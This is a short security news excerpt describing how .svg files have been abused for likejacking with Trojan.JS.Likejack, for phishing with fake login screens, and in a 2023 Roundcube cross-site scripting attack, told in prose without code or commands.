A malicious script, Trojan.JS.Likejack, is designed to download additional obfuscated JavaScript that enables it to automatically 'Like' a Facebook post while a user is logged in. This silent activity occurs without the user's awareness. The misuse of the .svg format in malicious contexts has been observed before, including in phishing attacks that trick users into revealing their credentials by displaying fake login screens. Malwarebytes reported that numerous adult sites abuse .svg files for manipulating likes, often returning under new accounts when shut down by Facebook.
Once decoded, the script causes the browser to download a chain of additional obfuscated JavaScript. The final payload, a known malicious script called Trojan.JS.Likejack, induces the browser to like a specified Facebook post as long as a user has their account open.
This Trojan, also written in Javascript, silently clicks a 'Like' button for a Facebook page without the user's knowledge or consent, in this case the adult posts we found above.
In 2023, pro-Russian hackers used an .svg tag to exploit a cross-site scripting bug in Roundcube, a server application that was used by more than 1,000 webmail services and millions of their end users.
Researchers documented a phishing attack that used an .svg file to open a fake Microsoft login screen with the target's email address already filled in.
Collection
[
|
...
]